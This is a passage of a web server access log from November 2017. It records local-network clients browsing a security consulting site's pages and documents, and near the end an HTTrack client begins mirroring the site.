Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1\" 200 43725 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1\" 200 45954 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:15 -0500] \"GET /uploads/2/9/1/4/29147191/protecting_your_identity.pdf HTTP/1.1\" 200 775340 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.26 - - [12/Nov/2017:16:16:01 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /backblue.gif HTTP/1.1\" 200 4529 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /fade.gif HTTP/1.1\" 200 1113 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /index.html HTTP/1.1\" 200 6932 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 
Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1\" 200 7835 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1\" 200 81378 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1\" 200 19526 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - 
[12/Nov/2017:16:16:02 -0500] \"GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1\" 200 42818 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1\" 200 47029 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:06 -0500] \"GET /products.html HTTP/1.1\" 200 7157 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] \"GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1\" 200 16602 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] \"GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1\" 200 26427 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] \"GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1\" 200 38061 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - 
- [12/Nov/2017:16:16:16 -0500] \"GET /bcp.html HTTP/1.1\" 200 6651 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] \"GET /uploads/2/9/1/4/29147191/601239_orig.png HTTP/1.1\" 200 111181 \"http://192.168.0.35/bcp.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] \"GET /uploads/2/9/1/4/29147191/4304070_orig.png HTTP/1.1\" 200 57269 \"http://192.168.0.35/bcp.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Coffee.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/bcp.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:05 -0500] \"GET /consulting.html HTTP/1.1\" 200 7269 \"http://192.168.0.35/bcp.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] \"GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1\" 200 120188 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - 
[12/Nov/2017:16:18:42 -0500] \"GET /contact.html HTTP/1.1\" 200 6976 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] \"GET /backblue.gif HTTP/1.1\" 200 4529 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] \"GET /fade.gif HTTP/1.1\" 200 1113 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /index.html HTTP/1.1\" 200 6932 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1\" 200 7835 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) 
AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1\" 200 81378 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1\" 200 19526 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1\" 200 42818 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like 
Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1\" 200 47029 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /resources.html HTTP/1.1\" 200 7569 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1\" 200 47804 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1\" 200 7769 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1\" 200 20174 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1\" 200 43725 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1\" 
200 45953 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:34 -0500] \"GET /uploads/2/9/1/4/29147191/principles_of_cyber.pdf HTTP/1.1\" 200 765195 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] \"GET /backblue.gif HTTP/1.1\" 304 182 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] \"GET /fade.gif HTTP/1.1\" 304 181 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] \"GET /index.html HTTP/1.1\" 200 6932 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 
(KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] \"GET /products.html HTTP/1.1\" 200 7157 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] \"GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1\" 200 16602 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] \"GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1\" 200 38061 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] \"GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1\" 200 26427 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] \"GET /risk.html HTTP/1.1\" 200 6606 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] \"GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1\" 200 55344 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS 
X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] \"GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1\" 200 174914 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:05 -0500] \"GET /about.html HTTP/1.1\" 200 7042 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] \"GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1\" 200 265419 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] \"GET /resources.html HTTP/1.1\" 200 7569 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 
(iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:16 -0500] \"GET /uploads/2/9/1/4/29147191/principles_of_encryption.pdf HTTP/1.1\" 200 1045139 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /incident.html HTTP/1.1\" 200 6621 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /uploads/2/9/1/4/29147191/4174185_orig.png HTTP/1.1\" 200 99002 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /uploads/2/9/1/4/29147191/1888827_orig.png HTTP/1.1\" 200 59026 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/incident.html\" 
\"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.36 - - [12/Nov/2017:18:35:47 -0500] \"GET /robots.txt HTTP/1.1\" 404 503 \"-\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:48 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:49 -0500] \"GET /backblue.gif HTTP/1.1\" 200 4529 \"http://192.168.0.35/\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:50 -0500] \"GET /fade.gif HTTP/1.1\" 200 1112 \"http://192.168.0.35/\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:51 -0500] \"GET /index.html HTTP/1.1\" 200 6932 \"http://192.168.0.35/\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:52 -0500] \"GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1\" 200 81377 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:53 -0500] \"GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1\" 200 19526 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 